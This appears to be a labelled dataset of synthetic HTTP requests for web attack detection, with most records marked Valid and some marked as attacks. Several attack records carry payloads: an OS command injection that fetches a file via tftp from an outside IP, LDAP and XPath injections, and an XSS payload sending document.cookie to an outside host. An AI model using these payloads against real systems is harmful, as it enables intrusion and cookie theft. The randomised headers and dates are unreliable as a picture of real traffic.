GET /nGqgMEbodyHsock_streamf/tvBmETt1wc1tE0BI26o/giNrE2nreplace/OQ31@mYFcNMlibjrq/aBho3_OD@siO/dM-/eeiiapye/qpIBRXpa.jpeg?g2hotjAa=adN9usrci&lfeAk1tzthmrr=sEk2ytk%40&rtsdyu4=evalse4an&spR6t1qsxw=95&mocha-R1m-rPr=ridrtcmlzsdto&vraitYrrtns=iIX9H8tqbsVn&cNrht=geegeal9g89sophiV&At=urariailrrsbaxistt&hoa7dpltotoiia=49140&scrwodiLeeii=41615626&UiVW=6ZRL_4Q9cZE HTTP/1.0
Host: www.ejpham.ch:08571
Connection: hiuNp4tm
Accept: application/rtf;q=0.4, text/*
Accept-Charset: x-mac-korean;q=0.7
Accept-Encoding: gzip;q=0.6, deflate;q=0.3, compress;q=0.5
Accept-Language: *
Cache-Control: min-fresh=25
Client-ip: 230.97.196.117
Cookie: po8tnmsySTdeund=mjihtttse
Cookie2: $Version="9"
Date: Wed, 04 Nov 09 20:39:43 CET
ETag: "LLew8Y8cibIIPZBcF"
Expect: 100-continue
From: nt7rur2b@ieUStzn.biz
If-Modified-Since: Sat, 02 Aug 08 15:26:39 GMT
If-Unmodified-Since: Sun, 17 Jan 10 18:49:28 CET
If-Match: *
If-None-Match: "cA3cbXqiA7Zyg-n2"
If-Range: *
Max-Forwards: 88
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: yRXtri n1kWTnb=A6rpn
Range: 906058-,973-830,9-
Referer: http://www.ooblae.de/ipldArTi/rbso/nenmqTe/erssofP/nrtnez9.jsp
TE: trailers
Trailer: Via
User-Agent: Mozilla/2.2 (compatible; Konqueror/5.0; Linux i586; Ihiranl)
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: euYe
Upgrade: lnd/8.0, hwTch/1.9, ody/0.6
Warning: 002 www.5girkg.js "MDcrsoovsn9ab8caPt" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 983767381261855
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23901
Start - Id: 43600
class: OsCommanding
GET /w@Mm0f./wsdeeytgoni/azEMeedmKKVUSLr9OE5/noha3wkxfy07pRUUCzdO/iYLc_q_B/tFuQMRvQnKq/sh.gif?sooesaceHax=%27%3Buftp+++-g++%2Fhome%2Ficstilntas%2Fmeilnelane++198.11.209.228+%2Fintiin++%3B HTTP/1.1
Host: 239.61.171.51:390
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i;q=0.2
Accept-Encoding: compress, deflate, deflate, identity;q=0.7
Accept-Language: *
Cache-Control: no-transform
Date: Tue, 01 May 07 18:33:21 CET
Expect: 100-continue
If-Modified-Since: Tue, 03 Nov 09 15:28:13 UTC
If-Unmodified-Since: Wed, 17 Feb 10 23:28:52 UTC
If-Range: Fri, 30 Jun 06 04:57:17 GMT
Max-Forwards: 520
Pragma: ts3='l4rn2ec'
Authorization: NTLM NWhPcjByb2VhZTBhZGE2c2VpY3J3Y2xrdHZJbWV5U29uYXNvcGVld24=
Referer: http://www.etsj.cz/n1na/yosteAg/oehctttu/eimy/yillnlr.nsf
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 2.1; df-eg; rv:1.2.7) Gecko/50900555
UA-OS: WinNT
Via: 6.6 www.lrl68aE.shtml

null

End - Id: 43600
Start - Id: 38577
class: LdapInjection
GET /lUBZ/zwmprocessing-instructionf/e1nTqt5dFzz/yhd1asgisutybnaT/sPjT1-E@YmRJfn/AbYeia3aS50ru/1@jZfvcnj/era3otaldljiStn/mK6Ha80w14vwBmYI/oRN@YnR@azM/aVC_.mspx?2ltgubix7ehMont=%29+%28++%7C+++%28+++cn%3D*o++++%27brien*+++%29%28mail+++%3D*o++%27brien*+%29+++&pc=329&erli=shTg8zJ_-_lw HTTP/1.1
Host: www.6wkNs.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.8, identity, identity;q=0.8, gzip;q=0.7, deflate
Accept-Language: *
Cache-Control: j8ngia9Z='gea7isar'
Client-ip: 231.216.109.79
Cookie: ln=uIeodtcaoD1matee;ohttpopen4FXVCoptqboot.iniE=3284;UQtL4qPUUzo=5;2rYn=1n99steneayel;13ZpM=i4J;Hnce2ia2uti=nin
Cookie2: $Version="987"
Date: Fri, 24 Nov 06 13:08:03 UTC
ETag: W/"INs.rY_u52VqhZ3fN"
Expect: UpT3s
From: sntdhp@rvsirrEwfi.it
If-Modified-Since: Thu, 04 Mar 10 03:22:05 UTC
If-Unmodified-Since: Sat, 03 Apr 10 02:00:47 UTC
If-Match: "dilbic2rBdLeSeaM"
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic YXRkdzJsSXI6ejJ0Zmlp
Authorization: Basic ZThzc2w6YmUzYUV0ZQ==
Range: -5
Referer: /mie6Tra/Dsnb/onAh/33Adx8/neoaS.exe
TE: trailers,chunked;q=0.1
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.1 (compatible; MSIE 2.8; Linux i586; xY7hh)
UA-CPU: PowerPC
UA-Disp: 9162,3647,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 639x8095
Via: FTP/1.2 153.237.119.41
Transfer-Encoding: compress
Upgrade: ksu/7.2, ear/3.1
Warning: 767 180.228.227.71 "tniR" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 0288802054604644545
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38577
Start - Id: 30651
class: Valid
GET /dt/st0h/tmrxr9exre2e7/zbfmnwz132t74zttpehH/tFMBXDg@kCnq/lVWvhb-W/a9wQjYxiaPXL_1DKAr/tivBEVbeH4/zpt/hH6dwL0yU/4TPAQF35.gif? HTTP/1.0
Host: 205.94.20.194:47375
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: axnutu='r4'
Client-ip: 208.242.86.47
Cookie: dickhsex2epa=v.Ow;onsajr9dtebtt=776718;rp5tkenluc=sAPT;Iwkarm2=aEGk
Cookie2: $Version="0"
Date: Mon, 07 Jan 08 01:57:56 CET
ETag: "Meg1EzYAlaX5p7IE"
Expect: fi1alor=b4fh
From: bcHnint@ntlNe.cz
If-Modified-Since: Sat, 05 Apr 08 02:11:44 CET
If-Unmodified-Since: Thu, 12 May 05 05:09:25 GMT
If-Match: "P@0M@vSS2ftLcKGO5AF"
If-None-Match: *
If-Range: Fri, 27 Apr 07 13:04:56 UTC
Max-Forwards: 3851
MIME-Version: 8.0
Pragma: s=hiBhaq
Proxy-Authorization: dsoan 0sitr=Hnaoh
Authorization: 41Srw0 9ewK=3r14p7
Range: 0-,163-,68-6
Referer: http://www.ge70h.gov/arhd3qkq/ddiqvs/cenznRtd/a4nxnpi/nhtbirrl.pl
TE: chunked;q=0.0,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: i2BXQ__Yn http://www.rowom.uk
UA-CPU: MIPS
UA-Disp: 251,682,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 7462x1873
Via: FTP/7.9 www.Pslse.jpg, deoimt/2.7 193.41.150.125, 4.1 www.jrkh.jpg
Transfer-Encoding: nrNera; 2et6=maoue
Upgrade: eMR/0.4, Xw1Rp/0.0, t9se4/2.1, chf/5.5, oF4di/5.3
Warning: 720 www.EsiaJw.png "nonetehehweionsu" 
X-Forwarded-For: 21.250.209.193
X-Serial-Number: 472936518137
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 30651
Start - Id: 34126
class: Valid
PUT /n4deetr4/uYsero7REVgit9JIAb_/teenboEovret0je/are1a1geyei6/aiAEdhrchisw7dsfe6/rnaargRh/t-qCv0Q-SEu/rqDIQ9voAXlnV5/scFBWd.GrGmCYD/rmtsoHmsydqtt/shLsHedlnofsrgrIsqn/Veo1Ho0tx.-.asmx? HTTP/1.1
Content-Length: 216
Content-Language: dbd
Content-Encoding: identity
Content-Location: http://oe9eoo.it/ecsttL/nEbh2/olahhko/etseehit/tiJr0.bin
Content-MD5: RWlyTmRuYm9yZG9zdGltdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Feb 04 17:27:53 UTC
Last-Modified: Fri, 03 Jun 05 21:44:32 UTC
Host: www.eaW0nn2.st
Connection: niDTe
Accept: */*
Accept-Charset: windows-1258
Accept-Encoding: gzip, identity;q=0.1, compress;q=0.1
Accept-Language: e-nbd;q=0.6, l-sme;q=0.7, m-qldje;q=0.9, slt5csi-Y;q=0.5
Cache-Control: max-age=341
Client-ip: 138.89.107.219
Cookie: 8l49imgw=41077;agof7yre4usaq=708255
Cookie2: $Version="7"
Date: Wed, 03 Sep 08 08:54:35 UTC
ETag: "PUSTask4J.90MLKR"
Expect: 100-continue
From: nepatoig@daos1pitqE.uk
If-Modified-Since: Thu, 29 Jan 09 04:14:11 UTC
If-Unmodified-Since: Fri, 23 Oct 09 22:09:57 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 03 Jul 06 04:28:09 UTC
Max-Forwards: 7
MIME-Version: 1.1
Pragma: no-cache
Proxy-Authorization: ot1o thnbfS=d3eeuo
Authorization: Basic YWlobmgwOkVsbjRlb28=
Range: -500777,66-
Referer: http://www.emrsa.net/ezIymow/5op7riro/auEn/leta/osphse.swf
TE: trailers,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.6 (X11; U; Linux i586 8.9; 0s-nt; rv:1.4.9) Gecko/69237850
UA-CPU: PowerPC
UA-Disp: 654,4575,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3127x6059
Via: FTP/9.4 208.68.136.99
Transfer-Encoding: tsvg
Upgrade: e1e/1.0, 4det/7.3, 8t7kr/3.5, cltiom/7.6
Warning: 295 www.ocnotj.css "efnmenvtT" 
X-Forwarded-For: 148.127.25.65
X-Serial-Number: 18830507621799
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

pw=usmKhyZ8&skrwwjT=u mg&dy17asS1o= os&ggssm=nsd\&_x7hUJKq=nmt&s8ms=391&iRltDhaaiol=owettPtgR&6nc.zlfHlWNrL=052113&NEcmYvewE=aazrjioioents9eG&eKtnesea9Kni3N=n0U3iAjji_&mqElv-script7=uqo]9rp5hEfa&lhtshwr1pday=0518

End - Id: 34126
Start - Id: 47653
class: XSS
GET /mn/p4-1WsUvWoC/e@Zvq4qWYnr.2p/Ur/etyuJcQeOciq83mBdim/pWi.dVoJHN/tec4aa/dpeeym/rNnEf3OjQFVtFeb7sTAE/sl9pzHd-J.js?eGtnEpb=e_aI7.-xl&ihW.wmLAC=xjho&elre=segZFj&sii=eqacsp7e&sdcg=084994709&tranEeI=2712&picger6geAentOt=%3C%3Cscript+%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.tearanve.com%2Fcgi-bin%2Freto.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&I3rEuro=4&ru3llt8el=i0ae0aowherena8 HTTP/1.0
Host: www.iiyapnbr.net
Connection: md7a5
Accept: application/x-tar, video/*, text/html
Accept-Charset: iso-2022-kr;q=0.9, x-mac-icelandic, iso-8859-15;q=0.8, x-mac-korean, iso-8859-3;q=0.5
Accept-Encoding: *;q=0.9
Accept-Language: u4Ea-ad5qso;q=0.3, ghpq-onosusa;q=0.1
Cache-Control: only-if-cached
Client-ip: 168.210.69.11
Cookie: niEg4garrmtihf=hL3z7r;cy8Tfhl=iepunrgenc;kOoHrfutD=tZ3QP;bcenesRq=692180;xRAdoAEh=1w1tm;L6GkanE=8801064
Cookie2: $Version="8"
Date: Wed, 28 Dec 05 09:54:44 GMT
ETag: W/"T6GZychf4Xyzvl1pm"
Expect: varybo=Gdejuu9m;vcuie=deknnr
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: NTLM Y1RkYnJleXZkdWNtRWloeWRia2hYc29Ob3RnY21KdHg2MXdwZXpFc3R1Y3YyZQ==
Authorization: Basic ZUl0Mzppb2F0c2xP
Range: 51-,059585-
Referer: http://newelkbm.be/ejtveiet.asmx
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: Via
User-Agent: Mozilla/1.1 (X11; U; Solaris 3.1; ea-vn; rv:9.0.6) Gecko/65934124
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: HTTP/4.5 237.61.37.249
Transfer-Encoding: es9es
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47653
Start - Id: 34799
class: Valid
PUT /gheA8/rcpLd5x1kMMs72do1/rs/hnwanehatodgolonen/deieased69bgawst/3RtO0U1rihzse/AEvHc3EHoRFqrF/t6TLs.f_.HoO.0y/08bFw19/j4E9R.-JNYI4m.jpg? HTTP/1.0
Content-Length: 156
Content-Language: gsxi
Content-Encoding: gzip
Content-Location: http://www.emeho.net/obiyhc.jsp
Content-MD5: dG9yczN4aWxxYmVyamFzaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 10 Apr 07 23:25:56 CET
Last-Modified: Sun, 03 Oct 04 11:32:50 GMT
Host: 118.248.205.115
Connection: keep-alive
Accept: */*
Accept-Charset: cp-932, utf-8, windows-1251, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: Tetoua-ddah, niCu-iel;q=0.2, hm-w8i
Cache-Control: no-cache
Client-ip: 209.200.52.73
Cookie: hi708spoa=tgeuB_iKb;slP5id=3;a3to25dsactho=592;an=1aa;ursasnnwoot7oba=giesih;umdt=a3toes gs
Cookie2: $Version="30"
Date: Sun, 13 Mar 05 05:14:32 GMT
ETag: W/"QmrzHoOP.OvzI5z9X7"
Expect: 100-continue
From: erhtiA@esgifshqt.ch
If-Modified-Since: Mon, 22 Dec 08 02:00:20 CET
If-Unmodified-Since: Tue, 06 Oct 09 19:34:14 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 20 Sep 05 15:55:32 GMT
Max-Forwards: 801
MIME-Version: 2.7
Pragma: idOmdaeK='ltqUsoSt'
Proxy-Authorization: Digest cnonce="7l7uhe"
Authorization: NTLM dHM5ZDhzdHp0MGVocklvaUE3c2ZtYWE5b3JjZWNyaWsyYTF5dA==
Range: -32368,1-
Referer: http://www.eW9jlitn.com/er7y.asp
TE: trailers
Trailer: Pragma
User-Agent: o2osaceIM4H
UA-CPU: x86
UA-Disp: 308,802,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 101x493
Via: 0.3 www.oe5cdDc.jpeg, tayo/9.6 www.feos8c.jpeg, 7.3 www.doti0g.htm
Transfer-Encoding: deflate
Upgrade: plgu/1.6
Warning: 507 208.255.183.240 "owchi" "Fri, 13 Oct 06 02:46:24 UTC"
X-Forwarded-For: 172.233.127.122
X-Serial-Number: 01547887992852
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

r4tyisreso8=nAyh&anwtgz2=rdabo&mmirmeniss=7&5is=n60vMU5&keecegn=6564975&Een=o@r-c&szspSEies=ehaNoieben2ialngSp&iKveyt83y5=|&tomrtlet=enes&arbl=em7Nmihaz

End - Id: 34799
Start - Id: 3018
class: Valid
GET /dwriiah6eniesaos/s6Ve@H2qc2/smZJ1B9QD-2ms/aKcOHkrAlhT9UtTxkD/.LmpwZAQ.gif? HTTP/1.0
Host: www.lexh.be
Connection: keep-alive
Accept: */*
Accept-Charset: shift_jis
Accept-Encoding: identity, gzip, identity;q=0.7
Accept-Language: uaej-nrft4qak;q=0.0
Cache-Control: no-cache
Client-ip: 109.15.123.3
Cookie: a0et59=isen;hlfomdseboexrne=ERyne;laeoyhA=spe-
Cookie2: $Version="951"
Date: Fri, 16 Apr 04 07:18:57 UTC
ETag: "qUHkNbL-yPO3IxUA"
Expect: Q2xtIRr=6kaR;acu0wur=e8heaott
From: Gnrp@qqtreOp.fr
If-Modified-Since: Thu, 07 Sep 06 19:29:21 UTC
If-Unmodified-Since: Tue, 29 Apr 08 14:04:57 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 1.8
Pragma: 0=teiho0mo
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: Digest response="cC0E4CfA8aaF4Fc841F0f2aF9bceb86d"
Range: 893626-,911123-5
Referer: /aeO53csg/Oilwn.cgi
TE: trailers,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/9.6 (Machintosh; U; PPC Mac OS X 5.7; ew-no; rv:4.6.7) Gecko/29599531
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 918x116
Via: 6.0 155.176.209.163, HTTP/2.8 www.tduaeo.tiff, 6.2 www.xw8enR.jpeg
Transfer-Encoding: identity
Upgrade: nenfhq/1.5, aiea/9.0, 8nTSn/3.7, sddt9/6.1
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3018
Start - Id: 1511
class: Valid
GET /xVpebetween5QfZqJJ.tiff? HTTP/1.1
Host: 125.34.42.144:80
Connection: teaFidr
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.8, identity;q=0.6, identity;q=0.0, compress;q=0.0, deflate;q=0.6
Accept-Language: gtlmeu-dlcnien
Cache-Control: yfy4u=anuad
Client-ip: 188.65.133.118
Cookie: uiht=H0s;tftsYsas5ole4t=7222849;ujdtesshr=eJh;hit=tZxxdm;hhpcw=6695966
Cookie2: $Version="3"
Date: Mon, 01 Jan 07 16:55:56 UTC
ETag: "Vl4vlakcNIFSotq"
Expect: 100-continue
From: tnuth@Essaahto.uk
If-Modified-Since: Thu, 02 Jul 09 12:01:52 UTC
If-Unmodified-Since: Mon, 28 Jul 08 01:13:12 CET
If-Match: *
If-None-Match: "cVLJD_2S2TB.Lkf"
If-Range: Tue, 25 Sep 07 20:24:33 CET
Max-Forwards: 39
MIME-Version: 7.1
Pragma: qiarx='E7x8ied'
Proxy-Authorization: NTLM Z2VzVEh6dmlxdHRlYXN5bTY3bmNhRGphY2h0b253NnRmaHJ0VGFFMw==
Authorization: Digest qop=auth
Range: 460-9787,-3
Referer: http://NElQo.de/dhctm/dcirplp/0aeiai.htm
TE: deflate;q=0.6,trailers
Trailer: If-Match
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 4.2; iw-no; rv:4.2.9) Gecko/22939569
UA-CPU: MIPS
UA-Disp: 679,166,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 1994x755
Via: 8.7 www.l3ea.png
Transfer-Encoding: compress
Upgrade: ma3Ld/8.0
Warning: 564 www.ellu.jpeg:2 "Sei8d" "Thu, 27 Jul 06 21:37:43 UTC"
X-Forwarded-For: 55.173.238.176
X-Serial-Number: 894892
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1511
Start - Id: 14410
class: Valid
GET /mjzwS-g0a.swf? HTTP/1.0
Host: 141.119.133.23:8
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-8859-9;q=0.5, cp-936, x-mac-hebrew;q=0.5, big5;q=0.8, windows-1251
Accept-Encoding: *
Accept-Language: *
Cache-Control: 08rb7Ihc='r'
Client-ip: 232.154.190.55
Cookie: C1iatutsomsFb=336;wv=lLmnta0ef;hDorU=921
Cookie2: $Version="69"
Date: Fri, 17 Oct 08 06:07:53 CET
ETag: W/"emvTOQ@e4W9o5stttr"
Expect: uruotj
From: Rt7eei@haruek9a0.st
If-Modified-Since: Tue, 23 Jun 09 02:26:16 GMT
If-Unmodified-Since: Tue, 02 Oct 07 09:23:36 GMT
If-Match: *
If-None-Match: "-MQURPsVCzXQJBvEF67."
If-Range: Tue, 11 Jan 05 01:13:57 GMT
Max-Forwards: 4
MIME-Version: 0.0
Pragma: m='n95zakna'
Proxy-Authorization: NTLM QVh0VFlscml0Wnd4dHJlbW9lYWVnQ2huaDJoaW5yc2FoZHhiaXhjdHM=
Authorization: xdtau tda4=OtsEo3
Range: -5585
Referer: /ttetra/actuU.swf
TE: trailers,trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.5 (X11; U; Linux i586 0.7; ea-ne; rv:1.8.0) Gecko/62340481
UA-CPU: StrongARM
UA-Disp: 769,941,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 9340x0516
Via: HTTP/6.4 www.1ppnanwp.tiff, HTTP/9.3 110.201.83.227
Transfer-Encoding: identity
Upgrade: ip2mmm/0.8, 5ngG/4.3, usbu/3.8
Warning: 995 www.tyeo.tiff "emterf" 
X-Forwarded-For: 224.226.145.150
X-Serial-Number: 87780574353743027289
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14410
Start - Id: 28016
class: Valid
GET /p@r_2X/hi/ipltiljitg3irrvSda/sy22spy9Z4rd/merjsEehnin/nnEtranwlrms/e4zFNledrX/Gh/hhbanbda/jB7vpDV3U-7R-Pc/9-.css?HyNiz=82&foer3oztgqc=dyw&panh=af0xlogrqO6md+i+anw&leeettcEdah=aom64ime1izsnnSrv8&mlh=Aagceeoo2l&erk9rwv=050074&5xCe9DTtahhp1em=%3Cmtie HTTP/1.0
Host: www.gios.biz:14182
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-6;q=0.4, x-mac-ce, cp-950;q=0.8, x-mac-cyrillic;q=0.9, x-mac-arabic;q=0.9
Accept-Encoding: compress, gzip, compress;q=0.4, gzip
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 188.7.31.94
Cookie: 2AjdP1=30266;SyuAinniaberoaf=rctr2;aesOloem= =i;egwdSlat=tin0dtO1includeUorise;wEssnoewnx6oe=hVaOSys7R;tgynEi8rre=doaEntrrm1o
Cookie2: $Version="4"
Date: Tue, 10 Jun 08 01:54:34 CET
ETag: "lczTiIcIZiFK5dSs"
Expect: 100-continue
From: gnfoD3ti@acjf.biz
If-Modified-Since: Fri, 30 Dec 05 11:08:58 GMT
If-Unmodified-Since: Thu, 08 Jan 04 02:00:00 UTC
If-Match: "QzoyUQe8qGtHBEba"
If-None-Match: "QOfyTDWE6wopdHt8g"
If-Range: Fri, 28 Apr 06 17:52:42 UTC
Max-Forwards: 7376
MIME-Version: 5.7
Pragma: d='i'
Proxy-Authorization: NTLM QTRjYWFhd3RhNHlnT2l0aWNvaWkxc3JoVG9ndGFhaWRscjhySGF0aG90
Authorization: uqd1da truUi=h5nc
Range: 595-13122,-57
Referer: http://nat4f.com/jsnxq/axatbCsu.swf
TE: deflate,chunked,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/6.4 (compatible; MSIE 2.1; Mac OS X; Ioosy; erqa3; seath)
UA-CPU: x86
UA-Disp: 6297,097,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4477x7117
Via: 4.5 www.6areu1s.html:2, utb/3.2 www.eoatn.css, 7.9 www.ejEaw.jpg:5
Transfer-Encoding: emot3
Upgrade: 9htud/6.5, uadanh/4.9, euxd/5.9
Warning: 600 www.t3xste.htm "ayawvwhS" "Wed, 03 Aug 05 13:48:43 UTC"
X-Forwarded-For: 83.205.211.13
X-Serial-Number: 45504056220
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28016
Start - Id: 24839
class: Valid
GET /jhnr/goecnie/iossitrnTsmes2s/x8e19cmd19hXNL5eQ/i10dr/naworueem/nvyy4b561L/posandqlm/lbtilmnoor6Ii.jpg?9omsmshi=4s+c0&fFnXBH3l0tn=3189&wJv8dpIG7@t=r6nU2YzCy&eea2oaseecoot=nehee&a4tsdeUts7ar=35054571&hEsAeenolimh=9hboot.inifK%5Dnnfaer&cWq-E3QrL=todhs0rie%28ncorDet%25e&wemlte=61047&pmt=i4ar HTTP/1.0
Host: www.cw0hTnue.uk
Connection: uirytf
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 210.248.202.218
Cookie: Iokwi5Inri=t9thle+5hnllo:Mc;lonhcto=cdtprocessing-instructioni r
Cookie2: $Version="51"
Date: Wed, 14 Oct 09 22:52:52 GMT
ETag: "8WUY6x@eoGBviaiE56jR"
Expect: 100-continue
From: dhavng@wnclnslrhd.biz
If-Modified-Since: Mon, 03 Apr 06 03:40:52 CET
If-Unmodified-Since: Mon, 09 May 05 19:46:56 UTC
If-Match: *
If-None-Match: "5zuhYkbDUdcgvKG"
If-Range: Sun, 28 Dec 08 16:13:17 UTC
Max-Forwards: 338
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: ue3ee emteai=apsdea
Authorization: NTLM aW8yRW00c3VyblR3ZW9nc29sT2F5aTVuaW1lenJpZG9zMElzc2xpV2pldWk=
Range: 89-,-8
Referer: /5Etitn/opeH.mdb
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/0.4 (Windows; U; Win 9x 2.0; 6s-1t; rv:1.3.1) Gecko/50819424
UA-CPU: x86
UA-Disp: 9323,238,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 577x412
Via: yueT/7.0 78.186.189.245:20657, HTTP/1.8 www.v0ef.html
Transfer-Encoding: TIearn; orseui=fjlb
Upgrade: slnd/7.7, n2now4/3.0, 8Sk/4.7, tIrah8/3.8, Nnodwe/5.3
Warning: 443 www.ssite.jpeg "Tswef" 
X-Forwarded-For: 158.74.188.248
X-Serial-Number: 934492
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24839
Start - Id: 28245
class: Valid
GET /iAdihrusIntib/aeniqszhmwrl/c47BA5j/emrenttydhea/nesaoemgvmkt/meimfa/aUe1oooq/ne/eg5lFCY-/hhg.png?Eixmsevsrsanau=epsr HTTP/1.0
Host: www.epapr.org
Connection: sazTn5mr
Accept: text/html, application/zip;q=0.9, video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: hEseve='i'
Client-ip: 141.31.102.223
Cookie: ohbdyesrruwr2=akdropmr
Cookie2: $Version="335"
Date: Wed, 29 Nov 06 23:59:15 UTC
ETag: W/"h5RyVwb5Q-2_w1WV@d6F"
Expect: ibTp1t=svzsd
From: e7ne1tE@sl9o.st
If-Modified-Since: Fri, 15 Jun 07 17:24:27 CET
If-Unmodified-Since: Wed, 25 Feb 09 03:58:27 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 07 Nov 07 09:13:45 CET
Max-Forwards: 09
MIME-Version: 8.6
Pragma: 2tcnsT='oxcn'
Proxy-Authorization: NTLM cmVuaXltZWVscGVyY29lb2xhaHRzYWVtc3N1bnJ3Ym9hcmFpSWRhY28xc3E=
Authorization: arsc2 p0nm=issr
Range: 560912-
Referer: /s0eetO/egeu1o4t/pmteeer3.msf
TE: trailers,gzip;q=0.8
Trailer: Host
User-Agent: 5e2T7H http://www.dEil.uk
UA-CPU: MIPS
UA-Disp: 957,7809,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 096x863
Via: 5.2 www.oios.html:525, HTTP/6.8 172.228.236.169
Transfer-Encoding: gzip
Upgrade: hqI/2.8, g7erkj/5.4
Warning: 811 www.crseaZNo.html "acteagHesqginonoemr" 
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 144317661774202
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28245
Start - Id: 49308
class: XPathInjection
GET /lcnnliut4wdnsyheod/nM_G.xef/atm.jpg?X_CXOxmlL=66++or++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D%28%28i%2Bj%2Bk%2Bl%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++9480%3D&awetrin=5939552&t8hhttthfau=e%40QbtnbM1p&rjer7a8=7abefkeuhaEna&O.pgRnHinsert=6&aloo=t+&e2=21901&7wrepR=dMmN&e5EB6lInT=7 HTTP/1.1
Host: 243.40.171.59
Connection: close
Accept: application/*;q=0.9, text/*;q=0.0, audio/*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: t-krni7st, b2fos-leief8N;q=0.1
Cache-Control: min-fresh=5
Client-ip: 160.6.170.73
Cookie: lnu=rKG;ro4=genenoiudnshyma;Qnph-So=01 seZoeval21;wUi1eynli=422;.aKwmVmOQWhC=7ro;r2G5T3kxp_locationAqC=os8KsRtusoY
Cookie2: $Version="01"
Date: Wed, 07 Nov 07 16:42:15 CET
ETag: W/"5oOwunHRVio4Nk9"
Expect: 100-continue
